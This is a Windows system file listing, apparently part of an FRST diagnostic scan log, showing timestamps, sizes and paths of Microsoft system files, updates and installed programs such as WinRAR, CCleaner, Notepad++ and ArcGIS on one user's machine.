2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2017-04-03 15:53 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2017-04-03 15:52 - 2015-12-16 20:53 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2017-04-03 15:52 - 2015-12-16 20:48 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2017-04-03 15:52 - 2015-12-16 20:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2017-04-03 15:52 - 2015-12-16 20:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2017-04-03 14:02 - 2017-04-03 14:02 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\WinRAR
2017-04-03 13:22 - 2017-04-04 16:30 - 00000000 ____D C:\Users\Tesla\Data
2017-04-03 13:12 - 2017-04-03 13:12 - 00000980 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2017-04-03 13:12 - 2017-04-03 13:12 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-03 13:12 - 2017-04-03 13:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-03 13:11 - 2017-04-03 13:26 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Notepad++
2017-04-03 13:11 - 2017-04-03 13:12 - 00000000 ____D C:\Program Files\WinRAR
2017-04-03 13:11 - 2017-04-03 13:11 - 00002782 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\Program Files\CCleaner
2017-04-03 13:11 - 2017-04-03 13:11 - 00000000 ____D C:\Program Files (x86)\Notepad++
2017-04-03 09:54 - 2017-04-03 09:54 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\IrfanView
2017-04-03 09:24 - 2017-04-03 09:24 - 00000000 ____D C:\Users\Tesla\AppData\Local\Hewlett-Packard_Developme
2017-03-31 16:07 - 2017-04-09 21:01 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Mozilla
2017-03-31 16:06 - 2017-03-31 16:07 - 00000000 ____D C:\Users\Tesla\AppData\Local\Mozilla
2017-03-31 16:06 - 2017-03-31 16:06 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Mozilla
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\LocalLow\Adobe
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Local\CEF
2017-03-31 16:02 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Local\Adobe
2017-03-31 15:58 - 2017-03-31 16:09 - 00001998 ____H C:\Users\Tesla\Documents\Default.rdp
2017-03-31 12:00 - 2017-03-31 12:00 - 00963232 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120.dll
2017-03-31 12:00 - 2017-03-31 12:00 - 00660128 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120.dll
2017-03-31 12:00 - 2017-03-31 12:00 - 00356528 _____ (Microsoft Corporation) C:\Windows\system32\vccorlib120.dll
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2017-03-22 19:47 - 2017-03-22 19:47 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2017-03-20 08:55 - 2017-03-20 08:55 - 00000000 ____D C:\Users\Tesla\OpenVPN
2017-03-20 08:45 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\AppData\Local\FME Desktop Help
2017-03-20 08:44 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\Documents\ArcGIS
2017-03-20 08:44 - 2017-03-20 08:45 - 00000000 ____D C:\Users\Tesla\AppData\Local\ESRI
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\Documents\FME
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Safe Software
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\ESRI
2017-03-20 08:44 - 2017-03-20 08:44 - 00000000 ____D C:\Users\Tesla\AppData\Local\Safe Software
2017-03-20 08:43 - 2017-04-07 16:03 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Skype
2017-03-20 08:43 - 2017-03-20 08:43 - 00000000 ____D C:\Users\Tesla\Tracing
2017-03-20 08:38 - 2017-03-20 08:38 - 00000000 ____D C:\Users\Tesla\AppData\Local\FreeCommanderXE
2017-03-20 08:35 - 2017-03-20 08:35 - 00000020 ___SH C:\Users\Administrator.CEDA\ntuser.ini
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Šablony
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Soubory cookie
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Poslední
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Okolní tiskárny
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Okolní síť
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Nabídka Start
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Dokumenty
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Obrázky
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Hudba
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Documents\Filmy
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\Data aplikací
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\AppData\Roaming\Microsoft\Windows\Start Menu\Programy
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 _SHDL C:\Users\Administrator.CEDA\AppData\Local\Data aplikací
2017-03-20 08:35 - 2017-03-20 08:35 - 00000000 ____D C:\Users\Administrator.CEDA
2017-03-20 08:35 - 2017-03-04 19:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-20 08:35 - 2017-03-04 18:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-20 08:35 - 2017-03-04 10:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-20 08:35 - 2017-03-04 10:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-20 08:35 - 2017-03-04 10:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-20 08:35 - 2017-03-04 10:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-20 08:35 - 2017-03-04 10:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-20 08:35 - 2017-03-04 09:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-20 08:35 - 2017-03-04 09:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-20 08:35 - 2017-03-04 09:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-20 08:35 - 2017-03-04 09:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-20 08:35 - 2017-03-04 09:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-20 08:35 - 2017-03-04 09:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-20 08:35 - 2017-03-04 09:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-20 08:35 - 2017-03-04 09:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-20 08:35 - 2017-03-04 09:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-20 08:35 - 2017-03-04 09:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-20 08:35 - 2017-03-04 09:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-20 08:35 - 2017-03-04 09:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-20 08:35 - 2017-03-04 09:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-20 08:35 - 2017-03-04 09:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-20 08:35 - 2017-03-04 09:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-20 08:35 - 2017-03-04 09:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-20 08:35 - 2017-03-04 09:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-20 08:35 - 2017-03-04 09:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-20 08:35 - 2017-03-04 08:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-20 08:35 - 2017-03-04 08:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-20 08:35 - 2017-03-04 08:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-20 08:35 - 2017-03-04 08:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-20 08:35 - 2017-03-04 08:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-20 08:35 - 2017-03-04 08:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-20 08:35 - 2017-03-04 08:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-20 08:35 - 2017-03-04 08:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-20 08:35 - 2017-03-04 08:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-20 08:35 - 2017-03-04 06:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-20 08:35 - 2017-03-02 20:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-20 08:35 - 2017-03-02 20:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-20 08:35 - 2017-03-02 20:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-20 08:35 - 2017-03-02 20:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-20 08:35 - 2017-03-02 20:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-20 08:35 - 2017-03-02 20:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-20 08:35 - 2017-03-02 19:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-20 08:35 - 2017-03-02 19:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-20 08:35 - 2017-03-02 19:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-20 08:35 - 2017-03-02 19:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-20 08:35 - 2017-03-02 19:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-20 08:35 - 2017-03-02 19:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-20 08:35 - 2017-03-02 19:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-20 08:35 - 2017-03-02 19:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-20 08:35 - 2017-03-02 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-20 08:35 - 2017-03-02 19:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-20 08:35 - 2017-03-02 19:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-20 08:35 - 2017-03-02 19:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-20 08:35 - 2017-03-02 19:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-20 08:35 - 2017-03-02 19:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-20 08:35 - 2017-03-02 19:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-20 08:35 - 2017-03-02 19:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-20 08:35 - 2017-03-02 19:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-20 08:35 - 2017-03-02 19:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-20 08:35 - 2017-03-02 19:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-20 08:35 - 2017-03-02 19:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-20 08:35 - 2017-03-02 18:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-20 08:35 - 2017-03-02 18:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-20 08:35 - 2017-03-02 18:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-20 08:35 - 2017-02-23 01:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-20 08:35 - 2017-02-23 01:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-20 08:35 - 2017-02-18 16:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-20 08:35 - 2017-02-18 16:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-20 08:35 - 2017-02-11 17:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-20 08:35 - 2017-02-11 17:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-20 08:35 - 2017-02-11 17:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-20 08:35 - 2017-02-10 18:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-20 08:35 - 2017-02-10 18:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-20 08:35 - 2017-02-10 18:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-20 08:35 - 2017-02-10 18:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-20 08:35 - 2017-02-10 16:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-20 08:35 - 2017-02-09 18:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-20 08:35 - 2017-02-09 18:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-20 08:35 - 2017-02-09 18:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-20 08:35 - 2017-02-09 18:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-20 08:35 - 2017-02-09 18:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-20 08:35 - 2017-02-09 18:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-20 08:35 - 2017-02-09 18:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-20 08:35 - 2017-02-09 18:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-20 08:35 - 2017-02-09 18:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
